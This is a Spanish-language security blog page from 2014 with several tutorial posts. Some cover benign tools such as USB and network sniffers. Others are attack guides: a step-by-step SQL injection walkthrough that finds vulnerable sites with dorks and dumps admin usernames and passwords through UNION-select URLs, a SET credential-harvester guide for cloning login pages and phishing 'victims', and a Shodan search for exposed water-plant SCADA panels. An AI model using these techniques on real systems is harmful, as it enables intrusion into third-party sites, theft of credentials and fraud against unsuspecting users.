jueves, 18 de diciembre de 2014

USBPcap un sniffer USB para Windows

USBPcap es un sniffer USB de código abierto para Windows (XP, Vista, 7 y 8). Es capaz de capturar toda la actividad de cualquier dispositivo USB en formato pcap para un posterior análisis con Wireshark (1.10.0rc1 o superior).



Su funcionamiento es muy simple, Una vez descargado (USBPcapSetup-1.0.0.7.exe) e instalado nos iremos a su directorio y ejecutaremos USBPcapCMD.exe para ver los Root Hubs. Después seleccionaremos el dispositivo que queremos monitorizar y el fichero donde se volcará la captura:







Para detener la captura solo tecleamos Control+C pararemos y podremos analizar el fichero pcap con Wireshark. Como podéis ver en la siguiente imagen podemos registrar toda la actividad del USB, incluido la escritura en ficheros:






También podemos ver la captura en tiempo real con el siguiente comando:

USBPcapCMD.exe -d \\.\USBPcap1 -o - |"d:\ProgramFiles2\Wireshark\Wireshark.exe" -k -i -

Web del proyecto: http://desowin.org/usbpcap/index.html

martes, 16 de diciembre de 2014

Demostración básica de Injección SQL

Hoy veremos una práctica muy básica pero efectiva, vamos a ver como podemos realizar una Injección SQL pero antes tenemos que tener claro algunos conceptos.





¿Qué es SQL?


Lenguaje de consulta estructurado o SQL (por sus siglas en inglés Structured Query Language) es un lenguaje declarativo de acceso a bases de datos relacionales, que permite especificar diversos tipos de operaciones en ellas. de sus características es el manejo del álgebra y el cálculo relacional que permiten efectuar consultas con el fin de recuperar de forma sencilla información de interés de bases de datos, así como hacer cambios en ellas.




Muchos CMS, (Sistemas de Gestión de Contenidos) utilizan SQL para acceder a una Base de Datos (PhpMyAdmin) y guardar información.





¿Y qué significa SQLi?




Es la abreviatura de SQL Injection. Aunque, SQLi es un bug bastante antiguo, existen  muchos CMS o páginas web con esta vulnerabilidad.





¿Como buscar paginas vulnerables a SQLi?




Con Google, sin embargo, también existen Dorks (Palabras claves para poder encontrar CMS vulnerables). De todas formas no es muy complicado encontrar sitios (Probablemente) vulnerables a SQLi. Un ejemplo muy sencillo sería, dirigirnos directamente a Google y en el buscador 

colocamos esto:



id = cat index.php?





¿Como saber si la página es vulnerable?


Bastante fácil, tan solo tenemos que colocar una ' (Comillas, coma, punto, cualquier carácter) al final de la variable, es decir: 

/index.php?id=28'



nos deberá marcar un error como este (Pueden variar los errores, pero el más común entre 

ellos es este):



You have an error in your SQL syntax; check the manual that corresponds to your MySQL 


server version for the right syntax to use near ''' at line 1



Sí de lo contrario no nos muestra error, quizás el sitio no sea vulnerable, pero esto no quiere decir que no lo sea el programador o administrador puede haber agregado  una función en PHP, para que no se muestren los errores.




Cabe mencionar que es un error muy común por parte de los administradores, ya que eso no arregla el bug, el bug sigue ahí, existen otros métodos de para explotarlo como  la Injección a ciegas pero eso lo veremos otro día.





Explotando el Bug




Ahora viene la parte un poco más complicada, antes de nada tenemos que saber lo siguiente:




UNION se usa para combinar el resultado de un número de comandos 




SELECT en un conjunto de resultados




Ya hemos comprobado que anteriormente nos lanzó un error y que por lo tanto

era vulnerable, ahora deberemos buscar la columna que provoca el error.
Supongamos que tenemos lo siguiente:

 /index.php?cat=45

Y tendremos que dejarlo como en el siguiente ejemplo, le deberemos añadir el símbolo menos (-)
delante de la variable 45 y detrás del símbolo igual (=), y luego le añadimos el "union" más el "select", de esta forma:



/articulo.php?articulo=-230+union+select+1--




Empezamos a partir del numero 1 o el numero 0, y le vamos agregando más números hasta que nos desaparezca el error en pantalla. (Es muy importante poner los guiones al final y las comas en los números).




/articulo.php?articulo=-230+union+select+1,2,3--




En el momento en el que veas uno o más numeros en la pantalla y haya desaparecido el error habremos encontrado la columna vulnerable.






En resumen los números nos marcan que podemos concluir la inyección en este caso me iré sobre el numero 2 (color azul).

Hay que tener en cuenta también, la versión de la base de datos si es 5.*.* - comunity se podrán sacar los nombres de las tablas y columnas, si de lo contrario es inferior a la versión 5,no se podrá extraer los nombres de las tablas y/o columnas, se tiene que hacer a ciegas y es un poco más complicado.

Para saber la versión de la base de datos (SQL) solo agregamos al final de union+select+1,2,3,4,5 database()

Sacando los nombres de las tablas

Remplazamos el numero 2 por group_concat(table_name) algo así:


/articulo.php?articulo=-230+union+select+1,group_concat(table_name),3,4,5
+from+information_schema.tables--

Es importante agregar el +from+information_schema.tables--, nos dará como resultado todos los nombres de las tablas que existen en la Base de dados.



Como se ve en la imagen, tenemos como resultado los nombres de las tablas. Pero hay un problema, el tamaño de la página nos limita la visión y solo vemos una cierta cantidad de numero de tablas. 

Sin embargo,podemos utilizar otra alternativa, en este caso será la opción "limit" que nos permitirá limitar el rango de registro, y así poder acceder a la tabla deseada.

En este caso, quitamos group_concat() y solo dejamos table_name y al final de information_schema.tables agregamos +limit+1,1-- así quedará la url:

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5
+from+information_schema.tables+limit+1,1--

Nos mostrará el nombre de la primera tabla, es decir, tendremos que buscar la tabla de la que queremos sacar los datos.

En este casola tabla que buscamos es admin, ahora vamos a convertirla en ASCII les dejo la herramienta online para el conversor de String a ASCII | http://easycalculation.com/ascii-hex.php

Una vez pasado a ASCII nos quedará algo así:

admin = 97 100 109 105 110

Extración de datos

Modificamos nuestra url algo que quede así (incluyendo el nombre de la tabla, pero convertida a ASCII):

/articulo.php?articulo=-230+union+select+1,group_concat(column_name),
3,4,5+from+information_schema.columns+where+table_name=char(97,100,109,105,110)--

Como resultado nos tendrá que imprimir los nombres de las columnas, por ejemplo:

email, contrasena, usuario, pwd


Esta parte es la más fácil, supongamos que ya sabemos los nombres de la tabla en este caso es admin y las columnas que nos interesan son usuario y pwd (contraseña), ahora hay que extraer los datos de esas dos columnas y para eso hacemos lo siguiente:

/articulo.php?articulo=-230+union+select+1,group_concat(usuario,0x3a,pwd),
3,4,5+from+admin-- 



Con esa simple inyección nos mostrará el usuario y contraseña de la administración. Si la contraseña esta encriptada en MD5 tendremos que utilizar alguna herramienta para poder descifrarla, también podéis utilizar alguna herramienta para encontrar el panel de administrador de la pagina que a veces anda bastante escondido. Y nada más por hoy espero que os sea de ayuda, hasta la próxima!

jueves, 4 de diciembre de 2014

Uniscan, Escaner de vulnerabilidades web

Hoy vamos a ver como podemos realizar un escaner a una web para encontrar posibles vulnerabilidades. Utilizaremos Uniscan, una herramienta que ya viene incorporada en BackTrack R3 que nos elabora un reporte con cierta información sobre el sitio en cuestión.

Utilizaremos Backtrack r3 ya que nos viene instalado por defecto en esta versión, lo primero que deberemos hacer será habrir una terminal y nos ubicareos en el directorio donde se encuentra Uniscan.

#cd /pentest/web/uniscan


Para poder ver las opciones de ayuda ejecutaremos Uniscan sin ningún parametro.

#./uniscan.pl


Nosotros vamos a realizar un simple escaneo de una web para ello necesitaremos un objetivo para escanear, elegimos la web y procedemos a escanear.

#./uniscan.pl -u http://web-ojetivo.es/ -bqdw




Al hacer esto ejecutaremos uniscan indicando que:

-u: examinara una url
-b: lo hará por background
-d: habilitara checkeos dinamicos
-w: habilitara checkeos a ficheros

Ya solo nos queda analizar el reporte de la ejecución que se guarda en:

#cd /pentest/web/uniscan/uniscan.log


Una hayamos accedido al reporte nos mostrará toda la información recolectada y las posibles vulnerabilidades. Y nada más por hoy, espero que os haya sido de ayuda, hasta la próxima.

martes, 25 de noviembre de 2014

Ataque de Phishing con SET desde Backtrack 5

El Phishing es un delito también conocido como estafa cibernética que aplica técnicas de ingeniería social para sustraer información confidencial. Este ataque consiste en obtener las credenciales de acceso a cuentas como clientes de bancos, servicios de pago online o cuentas específicas que manejan información privilegiada.



Es uno de los métodos más utilizados por los civerdelincuentes en los últimos tiempos, por su gran facilidad y efectividad. En el siguiente tutorial vamos a ver cómo se puede reproducir un ataque de estas características.




Lo primero será arrancar nuestra distribución de Backtrack, y por consiguiente damos click en Applications > BackTrack > Social Engineering Toolkit > set.





Social Engineering Toolkit(SET): Se trata de los vectores de ataques mejor elaborados, robustos y con mayores probabilidades de éxito que se han desarrollado en SET debido a que son específicamente diseñados para construir sitios web “ficticios” que son incitantes y creíbles para el objetivo, además cuentan con técnicas bastante elaboradas que permiten que un objetivo sea víctima sin enterarse tan siquiera que ha sido engañada.




Una vez en el menú de opciones, seleccionaremos la opción 2 

(Website Attack Vectors).





Ahora seleccionamos la opción 3 (Credential Harvester Attack Method).




Credential Harvester Attack Method: Este tipo de ataque permite a un atacante clonar un sitio que tenga algún tipo de formulario de autenticación (formularios donde se solicita usuario y clave, como por ejemplo gmail) posteriormente cuando una víctima ingresa en dicho sitio e ingresa sus credenciales de acceso, SET recolecta toda esta información y posteriormente envía al usuario al sitio original.



Finalmente cuando el atacante desea finalizar la ejecución del ataque,
obtiene un informe con la información recolectada.



Luego tenemos que seleccionar la opción 2 (Site Cloner).


Nos pedirá nuestra ip para mandarnos la información, abrimos una terminal escribimos ifconfig y en la interfaz con salida a internet tendremos nuestra Ip, la copiamos y la pegamos en SET ...

Luego tendremos que poner la url del sitio a clonar.

Y ahora solo tenemos que camuflar nuestra ip en un link y enviársela a la "víctima", esperamos a que la "víctima" haga clic en nuestro link, y lo llevara a nuestro sitio falso para que proporcione sus credenciales de acceso.

Una vez se registre la "víctima", la página de registro volverá a cargarse pero esta vez si mostrará la página original,  la víctima volverá a introducir sus datos (y no se habrá dado cuenta de nada), nosotros habremos recibido sus datos en la shell de SET, y todo el mundo contento :) .

Bueno y hasta aquí por hoy, espero que os haya servido,
hasta la próxima!

miércoles, 19 de noviembre de 2014

¡Cuidado Gamers!“ Un salvapantallas gratis” detrás del robo de objetos valiosos en Steam

Hace bastante tiempo que los gamers son considerados por los civerdelincuentes como un objetivo idóneo, y desde hace años nos vienen alertando sobre los trucos que se han utilizado para intentar engañarlos o robarles credenciales.

Con el incremento de las plataformas de distribución digital de juegos como Steam y el uso que hacen de ellas millones de usuarios cada día, estas se han convertido en un objetivo que atrae cada vez a más delincuentes. Durante esta semana hemos visto cómo se ha utilizado el Marketplace de Steam y otros sitios similares como CSGolounge para vender supuestos "chollos" de bienes virtuales utilizados por algunos jugadores en sus juegos favoritos.

Los delincuentes han utilizado estas ofertas para atraer a usuarios despistados y convencerlos para que instalen un aparentemente un inofensivo salvapantallas, que en realidad contenía una amenaza para sus preciados bienes digitales. El robo de bienes es frecuente en casos en que los jugadores reciben ataques de bandas de delincuentes con correos electrónicos de phishing o con software de robo de contraseñas, para obteneracceso a sus credenciales.

¿Cómo funciona esta amenaza?

Gracias a la investigación realizada por algunos usuarios en algunos foros de la red podemos, comprobar que el aparentemente inofensivo salvapantallas, que los usuarios identifican como tal por su extensión .SCR, es en realidad una aplicación maliciosa desarrollada en .NET C# con algunas características que sacan a relucir sus verdaderas intenciones.





Hay muchas cosas interesantes en este trozo de código, comenzando por el Identificador de Steam del ladrón localizada en la función “addOffer” y otras funciones que destacan como la llamada “addItemsToSteal”, la cual claramente realiza un listado de aquellos objetos virtuales de valor que pudiera tener la víctima haciendo una búsqueda por sus nombres.

Los delincuentes buscan varios objetos usados en distintos juegos aunque principalmente se ha observado que están interesados en los juegos Counter Strike: Global Offensive, DOTA 2 y Team Fortress 2.

Si nos fijamos en la última función “sendMessageToFriends” veremos cómo su finalidad es enviar un mensaje de forma automática a todos nuestros contactos en el sistema de mensajería instantánea de Steam.




De esta forma, los delincuentes consiguen que su amenaza se propague como si  de un gusano clásico de mensajería se tratase, ya que cuantos más usuarios pulsen sobre el enlace, más víctimas y, por ende, objetos valiosos conseguirán los creadores de esta amenaza.



Tras analizar a fondo la amenaza podemos concluir que la finalidad de esta no es infectar el sistema ni robar la contraseña de Steam, pero no estaría de más que la cambiaras si tienes sospechas de haber sido afectado. Como medida adicional de protección, puedes reinstalar Steam para forzar que se genere un nuevo ID de sesión y evitar así que el anterior sea utilizado de forma fraudulenta.



Fuente: We Live Security

martes, 18 de noviembre de 2014

Shodan un buscador con mucha personalidad

Algunos han descrito Shodan como un motor de búsqueda para los ciberdelincuentes,
e incluso lo han llamado " el motor de búsqueda más peligroso del mundo".




Fue desarrollado por John Matherly en 2009, literalmente: "World’s first computer network search engine lets you locate computers based on IP, operating system or services

running". Es decir, es un buscador que, busca por direcciones IP, routers, servicios y
sistemas operativos. 

Shodan permite hacer diferentes tipos de búsquedas: Búsquedas por país, búsquedas por puerto, búsquedas por software, búsquedas por versión de software ...

Sin duda una gran herramienta para los administradores de sistemas, pero por otra parte sirve también de gran ayuda para los civerdelincuentes, los que con una sencilla búsqueda pueden encontrar información crucial sobre un sistema. Como podéis ver más adelante, vamos a utilizar Shodan para encontrar sistemas Scada.

SCADA es el acrónimo de Supervisory Control And Data Acquisition. Un sistema Scada esta basado en un programa de control que permite supervisar y controlar a distancia una instalación, proceso o sistema de características variadas, que pueden ir desde

controlar una caldera, hasta controlar toda un fábrica de lavado.

Lo curioso es que muchos de estos sistemas están conectados directamente

a internet y se controlan por ordenadores accesibles en remotos.

Con Shodan, con una sencilla búsqueda, es posible descubrir que hay conectados

a la red, ordenadores con paneles de control de plantas depuradoras de agua.
Para encontrar alguno de ellos, una sencilla búsqueda como



En el ejemplo vemos que se trata de una planta depuradora de agua. Veremos que hay algunos sistemas conectados pero todos nos piden usuario y contraseña, pero el simple hecho de que estén conectados a Internet es un riesgo bastante serio que permite atacar directamente ese sistema de autentificación. Y podríamos seguir así buscando muchos tipos de sistemas como cámaras ip, Servidores SIP y Terminales VoIP, equipos de plantas de control de agua, decodificadores, casas domóticas y un largo etcétera.

Y asín con cientos de sistemas que día a día corren el riesgo de ser atacados, por el "simple" hecho de que cualquier usuario del mundo pueda acceder a loguearse en sus paneles de control. 

Bueno y hasta aquí por hoy, espero que haya quedado claro la facilidad con la que podemos acceder directamente a muchos sistemas de control que están conectados a internet constantemente, nada más, un saludo!

domingo, 16 de noviembre de 2014

Pon un seguro a tu vida digital

Algo que hoy en día nos afecta a todos es el robo de identidad, muchos estaréis al tanto de las últimas noticias sobre este tema. Quizás el caso más sonado en los últimos meses haya sido los ataques masivos de phishing contra Icloud, la publicación de imágenes comprometidas de un centenar de famosos del cine y la música, tras un hackeo al servicio de almacenamiento aprovechando una vulnerabilidad del sistema de almacenamiento en la nube de Apple.

Estos ataques y otros muchos, son más comunes de lo que parecen, y el hecho de que todos utilicemos estos servicios tan conocidos (como Apple, Microsoft, las redes sociales etc...) origina que toda nuestra información personal esté expuesta a todos los ataques
realizados contra estos servicios.


Porque claro, quién no tiene una cuenta en Twitter o en Facebook, en los tiempos que corren es algo inverosímil, sería aceptar que carecemos de vida social.

Y por ese motivo, (porque es casi imposible que no utilicemos estos servicios y que no quedemos expuestos a estos ataques) nació "Latchuna herramienta que nos proporciona un "pestillo" para nuestra vida digital.




Latch te permite realizar un seguimiento de tus cuentas pareadas, y te envía una alerta cada vez que se produce un intento de acceso a una cuenta que tengas bloqueada.También puedes programar fácilmente tus servicios para que se “apaguen” automáticamente durante determinadas horas, por ejemplo de noche o cuando estés de vacaciones, para proteger de forma sistemática tus cuentas.

Gracias a Chema Alonso y su equipo de Eleven Paths, podemos añadir un punto más
de seguridad a nuestra vida digital, prácticamente sin ningún esfuerzo. Simplemente
tienes que abrir o cerrar el "pestillo".



Puedes descargarlo desde aquí.

Y bueno, aquí abajo os dejo un par de videos sobre Latch y sus últimas actualizaciones,
 nos vemos en el siente post, un saludo!



domingo, 9 de noviembre de 2014

Realmente crees que si lo subiste a internet, fue eliminado ?

Anoche estuve viendo un documental sobre delitos informáticos cometidos en España, se llamaba "ojo con tus datos" producido por televisión española, y en él básicamente nos hablan del rastro que dejan nuestros datos y de lo que nos puede suceder si alguien se aprovecha de estos datos para realizar cualquier tipo de delito informático, algo muy común debido al gran uso que hacemos hoy en día de todo tipo de tecnologías .

Todos sabemos que muy pocas personas se preocupan por los datos o por el rastro que dejan al navegar por internet, esto es una presa fácil para las grandes empresas que se publicitan por toda la red y que se dedican a recaudar datos y crear patrones para lanzar grandes campañas de marketing abusivas, o simplemente para hacer negocio con tus datos con el famoso "archiving".

Estas personas que no se preocupan por sus datos, son también una presa fácil para toda clase de "ciberdelincuentes", esto lo hace sin duda un negocio bastante rentable, y también nos expone a todos los usuarios de estas tecnologías a todo tipo de ataques.

En resumen, estamos expuesto constantemente, y tenemos que prestar especial atención a toda la información personal que con o sin nuestro consentimiento subimos a la red.


Lo que queda claro es que la información es poder, y que cuanto menos nos preocupemos de esa información, más poder tendrán sobre nosotros las grandes empresas y gobiernos de este mundo.


Por último os voy a reproducir un pequeño tutorial que salía en el documental, donde Chema Alonso nos mostraba un simple ejemplo de cómo podemos encontrar fácilmente y sin necesidad de conocimientos, archivos que  previamente hayan sido "eliminados". (Como ya sabemos es casi imposible borrar completamente un archivo que haya sido subido a la red).

También os dejo por aquí el documental completo:


El ejemplo es con la página web de la Casa Real , en la siguiente imagen podemos ver como está publicada a día de hoy.




Si queremos ver que es lo que se ha borrado de los buscadores, solo debemos añadir a la url el fichero robots.txt, podremos ver que hay una dirección (/ES/FamiliaReal/Urdangarin/) que se a eliminado.




Si realizamos una sencilla búsqueda en el buscador y le pedimos las url con esas direcciones podemos ver que solo nos sale solo una entrada, pero abajo nos muestra una pequeña de notificación que nos dice : "repetir búsqueda e incluir los resultados que se han omitido".




Si pinchamos en esa notificación veremos una lista con direcciones que ya no están indexadas y que no se puede ver el contenido pero sin embargo nos sigue apareciendo la dirección, y esto es porque aunque entremos a la url y esta haya sido eliminada, sabemos que su ubicación principal no es el único sitio en el que se ha podido copiar esta información.




De esta manera si quisiéramos ver el contenido simplemente entraríamos a una de las urls
anteriores y la copiaríamos (aunque parece ser que a raíz de este documental se han intentado esforzar en la Casa Real para borrar lo mejor posible el contenido de las urls, por lo que si accedemos a cualquiera de ellas nos aparece esta única dirección: "http://www.casareal.es/ES/Paginas/CustomErrors/Error404.aspx".




Pero si nos vamos a atrás de nuevo y buscamos debajo de las entradas veremos que nos muestra las urls pero no están completas, sin embargo en algunas tenemos la opción de traducir la página, lo hacemos y nos mostrará una nueva página en la que ahora sí nos muestra la url completa, la copiamos, y por último solo nos quedaría buscar en un servicio de archivado de páginas web como Archive.org.






Una vez estemos en Archive.org pegamos la dirección que habíamos copiado antes para ver si se a realizado alguna copia de esta web anteriormente, y vamos a ver que se han realizado varias copias en diferentes fechas, entramos en la primera "3 de Enero" y ahí tenemos la web que buscamos que supuestamente había sido "eliminada". Bueno y nada más por hoy, espero que os haya gustado, nos vemos en el siguiente post, un saludo!







lunes, 27 de octubre de 2014

Cómo esnifar el tráfico de red con Capsa Network Analyzer

Hoy os vengo a mostrar como podemos capturar el tráfico con Capsa Network Analyzer. 
Capsa es una solución para la captura y análisis de paquetes treméndamente potente y completo, con una interfaz fácil de usar que permite tanto al veterano y a los usuarios principiantes la capacidad de proteger y controlar las redes en un entorno empresarial crítico.

Descargar el programa de su página web oficial:

www.colasoft.com

Una vez lo hayamos descargado lo abriremos y veremos que el programa posee una

interfaz gráfica bastante intuitiva y muy fácil de comprender.

Para comenzar podemos ver que en "Capture" podemos crear una nueva captura y en "Replay" podemos cargar una captura ya creada. Para comenzar a crear una nueva captura, primero nos vamos a la parte superior  a la sección "Adapter" para elegir el adaptador de red que vamos a utilizar, en mi caso solo sale uno ("Wireless Network Connection" ) que es la conexión wifi,

Luego nos moveremos a la parte inferior para elegir el tipo de escaneo que vamos a utilizar, en este caso utilizaremos "Full Analysis" para realizar una captura completa de todos los protocolos en la red que hemos elegido anteriormente. Y para salir de la captura simplemente le tendremos que dar a "Stop".


Y por último para comenzar la captura le daremos click a "Start".





Como podemos ver en la parte de la izquierda tenemos una columna con los direferentes protocólos, las direcciones "MAC" y las direcciones "IP" , en forma de ramificación de esta manera esta mucho más claro, y nos resulta mucho más fácil realizar busquedas.

En las primeras gráficas de la pestaña "default" nos muestra la cantidad de paquetes y la velocidad a la que se envían y reciben. También podemos ver estadísticas de la cantidad del ancho de banda que están utilizando las diferentes "Ip" y "protocólos". En la pestaña de "summary" nos mostraría la velocidad total del tráfico de la red.



También deberíamos saber que para realizar una búsqueda de una trama en concreto nos iremos a la pestaña de "IP conversation" y aquí podremos ver todas las tramas con las diferentes "IP" asociadas, y si quisiéramos buscar la trama por el protocolo que tiene, nos iríamos a la pestaña de "TCP conversation" y para hacer una búsqueda más concreta, pues en la barra de arriba pondríamos el protocólo o la dirección y le daríamos al botón de "buscar". Y nada más por hoy, espero que os haya sido de ayuda, nos vemos en el siguiente post, un saludo!



viernes, 24 de octubre de 2014

Cómo esnifar el tráfoco de red con Microsoft Network Monitor

Buenas a todos hoy veremos como podemos esnifar el tráfico de red con Microsoft Network Monitor. Network Monitor es una herramienta de diagnóstico de red que permite monitorizar Lans y nos proporciona una visualización gráfica de las estadísticas de la red. Los administradores de red pueden usar estas estadísticas para realizar tareas de resolución de problemas rutinarias, tales como la localización de un servidor fuera de servicio/caído o aquel que esté reibciendo un número desproporcionado de peticiones de trabajo.


En resumen es otro sniffer , solo que está orientado más al ámbito empresarial, nos muestra diferentes estadísticas que podemos comparar para resolver problemas.


Lo podremos descargar de su página oficial :



Una vez descargado lo abrimos,

Ya abierto podremos ver la interfaz de inicio, desde "File" podemos abrir o crear una nueva captura.


En "view" nos muestra las capturas recientes y las redes seleccionadas, en "tools" podremos ver las opciones y en "help" tenemos las opciones de ayuda y también podemos buscar actualizaciones.



Ahora para crear una nueva captura primero debemos irnos a la parte inferior y seleccionar las redes que queremos sniffar. Una vez seleccionadas nos iremos a la parte de arriba y le damos en "new capture".



Aquí primero para que empieze a sniffar, le tenemos que dar a "start" y automáticamente comenzará a sniffar la conexión.


Cuando empiece a sniffar en la parte izquierda podremos ver todas las tramas divididas en foma de ramificación lo que nos facilitará muchísimo el trabajo.




Y por último creo que también sería bueno saber como crear un filtro, simplemente nos colocaríamos encima de la trama con el protocolo que queremos filtrar y le damos click derecho y seleccionamos la tercera opción y nos aparecerá el filtro en la sección de "Display filter", le damo en "apply" y ya nos habrá aplicado el filtro.



Y si queremos salir de filtro le damos a "Remove". Y  nada más por hoy, espero que os haya sido de ayuda el post, nos vemos en el siguiente. Un saludo.